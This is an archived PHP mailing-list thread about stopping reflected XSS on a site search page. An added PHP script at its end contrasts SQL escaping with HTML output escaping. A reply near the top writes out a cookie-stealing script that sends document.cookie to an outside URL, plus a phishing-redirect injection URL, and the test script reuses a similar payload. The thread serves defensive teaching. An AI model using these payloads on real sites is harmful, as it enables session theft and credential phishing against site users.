Re: Preventing XSS Attacks

You can write a cookie stealer in a few moments using XSS:
<script>
document.location="http://php.net/cookiestealer.php?cookie="+document.cookie;
</script>

It's not that hard ;)

If I saw such an XSS vulnerability I would add something like:
youwebsite.com/index.php?searchquery=<script>window.location="http://myphishingpage.com";;</script>

(of course, everything will be URL encoded, etc.)

Then your users will be redirected through YOUR domain name to my
webpage, which will contain an exact copy of your page and will
require users to re-login to the system ;)
(and log their login information)


There are tons of options; I have investigated one of them. Just make
sure your input is what it should be and you will be good (also make
sure you don't execute your input in any way, neither in
exec()/system()/eval() nor in a database query).

(by the way, are you aware of XSRF/CSRF?)

HTH,
Nitsan

On Wed, Jun 10, 2009 at 7:09 PM, Ashley Sheridan
<ash@xxxxxxxxxxxxxxxxxxxx> wrote:
>
> On Wed, 2009-06-10 at 12:55 -0400, Eddie Drapkin wrote:
> > The problem with using a database escaping string for output escaping
> > is that something like (despite being the world's lamest XSS)
> > <script>
> > location.href('google.com')
> > </script>
> > Would output mostly the same and with some cleverness, it wouldn't be
> > too hard to get that to function properly with a full fledged XSS
> > attack.  I'd personally use one of the FILTER_* constants in
> > conjunction with the filter functions themselves, say filter_var and
> > FILTER_SANITIZE_SPECIAL_CHARS.
> >
> >
> > On Wed, Jun 10, 2009 at 12:44 PM, Ashley Sheridan
> > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> >         On Wed, 2009-06-10 at 18:28 +0200, Nitsan Bin-Nun wrote:
> >         > mysql_real_escape_string() only sanitises the input. I would
> >         > personally only allow [a-zA-Z0-9-_] in search strings, but
> >         > that's just me ;)
> >         > Validate the input in some way, or make extra sanitisation of
> >         > it before running the search query.
> >         >
> >         > Regarding the HTML output, just htmlentities() it and you'll
> >         > be good :)
> >         >
> >         > On Wed, Jun 10, 2009 at 6:32 PM, Ashley Sheridan
> >         > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> >         >
> >         >         On Wed, 2009-06-10 at 18:18 +0200, Nitsan Bin-Nun
> >         wrote:
> >         >         > As for the output, just htmlentities() it and you
> >         >         > will be good.
> >         >         >
> >         >         > You'd better check the search query for SQL
> >         >         > injection, which is more dangerous.
> >         >         >
> >         >         > HTH
> >         >         > Nitsan
> >
> >         >         >
> >         >         > On Wed, Jun 10, 2009 at 6:19 PM, Ashley Sheridan
> >         >         > <ash@xxxxxxxxxxxxxxxxxxxx> wrote:
> >         >         >         Hi all,
> >         >         >
> >         >         >         I'm looking at adding a new search feature
> >         >         >         to my site, and one of the elements of this
> >         >         >         is to echo back in the search results page
> >         >         >         the original string the user searched for.
> >         >         >         Up until now, XSS hasn't (afaik) been an
> >         >         >         issue for my site, but I can see from a mile
> >         >         >         off this will be. What would you guys
> >         >         >         recommend to avoid this?
> >         >         >
> >         >         >         I'd thought initially of using a mixture of
> >         >         >         htmlspecialchars() and a regex (as yet not
> >         >         >         sure what I'll be stripping out with this)
> >         >         >         to sanitise the output for display on the
> >         >         >         results page, but is this enough?
> >         >         >
> >         >         >         Thanks
> >         >         >         Ash
> >         >         >         www.ashleysheridan.co.uk
> >         >         >
> >         >         >
> >         >
> >
> >         >         I always use mysql_real_escape_string() for that
> >         >         sort of thing, not had a problem with it, but is
> >         >         there anything you think I should be wary of?
> >         >
> >         >
> >         >         Thanks
> >         >         Ash
> >         >         www.ashleysheridan.co.uk
> >         >
> >         >
> >         >
> >         >
> >
> >         [just bringing it back on list]
> >
> >         Well, I don't understand, what is the problem with
> >         mysql_real_escape_string() for sanitising input to use for a
> >         search? It should escape anything out so that the query can't
> >         be used in ways that I don't want, no?
> >
> >         I'd thought about using a whitelist-only regex, but that seems
> >         a little limiting tbh, and as my site contains code, it's not
> >         unreasonable to expect some people might want to search for
> >         particular code excerpts.
> >
> >
> >
> >         Thanks
> >         Ash
> >         www.ashleysheridan.co.uk
> >
> >
> >
> >         --
> >         PHP General Mailing List (http://www.php.net/)
> >         To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
> Oh no, I think I'm misunderstood here. I was going to use
> mysql_real_escape_string only for the database input, and use
> htmlentities for the display output, as essentially they are separate,
> and should be treated as such.
>
> I've been doing a bit of reading, and I can't really understand why XSS
> is such an issue. Sure, if a user can insert a <script> tag, what
> difference will that make to anyone else, as it is only on their own
> browser.
>
> Thanks
> Ash
> www.ashleysheridan.co.uk
>
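As an added example (not code from anyone in this thread or from php.net), the
PHP script below puts the thread's suggestions side by side on one constructed
search string: a SQL-style escape, htmlspecialchars(), Eddie's filter_var()
with FILTER_SANITIZE_SPECIAL_CHARS, and Nitsan's whitelist regex. Its point is
the one Ash arrives at: escaping for the database and escaping for HTML output
are different steps, and only the HTML step neutralises a reflected <script>
tag. Assumptions: addslashes() stands in for mysql_real_escape_string() (which
needs a live connection and no longer exists in PHP 7+), example.invalid is a
placeholder host, and $pdo in the trailing comment is a hypothetical connection.

```php
<?php
// Added example (not code from the thread). Escaping a value for a quoted SQL
// literal leaves '<' and '>' untouched, so a reflected search string still
// reaches the browser as a live <script> element unless it is also HTML-escaped.

// Constructed search input in the shape of the cookie stealer quoted in the
// thread; example.invalid is a reserved placeholder hostname.
$payload = '<script>document.location="http://example.invalid/?c="+document.cookie</script>';

// Stand-in for mysql_real_escape_string(): addslashes() escapes the same quote
// and backslash characters offline (the real function also handles \n, \r,
// \x1a and the connection charset). Only meaningful inside a quoted SQL value.
function escape_for_sql(string $s): string
{
    return addslashes($s);
}

// Treatment for text placed in an HTML element body or a quoted attribute.
function escape_for_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Eddie's alternative: filter_var() with FILTER_SANITIZE_SPECIAL_CHARS, which
// HTML-encodes the same metacharacters plus ASCII control characters.
function filter_for_html(string $s): string
{
    return filter_var($s, FILTER_SANITIZE_SPECIAL_CHARS);
}

// Nitsan's whitelist: accept only [a-zA-Z0-9_-] and reject everything else.
// Strict, but it rules out the code excerpts Ash wants people to search for.
function whitelist_search(string $s): ?string
{
    return preg_match('/^[a-zA-Z0-9_-]+$/', $s) === 1 ? $s : null;
}

// The results-page fragment: the echoed term goes through escape_for_html()
// regardless of what was done to it on the way into the database.
function render_results_heading(string $term): string
{
    return '<h2>Results for "' . escape_for_html($term) . '"</h2>';
}

// True if the string still contains a raw '<', i.e. a tag a browser would parse.
function has_live_tag(string $s): bool
{
    return strpos($s, '<') !== false;
}

$treatments = [
    'raw'             => $payload,
    'escape_for_sql'  => escape_for_sql($payload),
    'escape_for_html' => escape_for_html($payload),
    'filter_for_html' => filter_for_html($payload),
];
foreach ($treatments as $name => $value) {
    printf("%-16s live tag: %-3s %s\n", $name, has_live_tag($value) ? 'yes' : 'no', $value);
}
// Only the raw and SQL-escaped values keep a live tag; both HTML treatments
// turn '<' into '&lt;' (or '&#60;') so the browser renders text, not a script.

echo render_results_heading($payload), "\n";
var_dump(whitelist_search($payload));        // NULL: rejected by the whitelist
var_dump(whitelist_search('htmlentities'));  // string: accepted

// For the query itself, a prepared statement removes the need for string
// escaping altogether (hypothetical $pdo connection, so not executed here):
//   $stmt = $pdo->prepare('SELECT id, title FROM posts WHERE body LIKE ?');
//   $stmt->execute(['%' . $payload . '%']);
```

Run it with `php` on the command line. The output table makes the separation
visible: the SQL escape only adds backslashes before the quotes, while the two
HTML treatments are the ones that change `<script>` into something inert. The
whitelist is the strictest option, but as the thread notes it is a trade-off
against searching for code, which is why escaping on output is the step that
must always happen.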
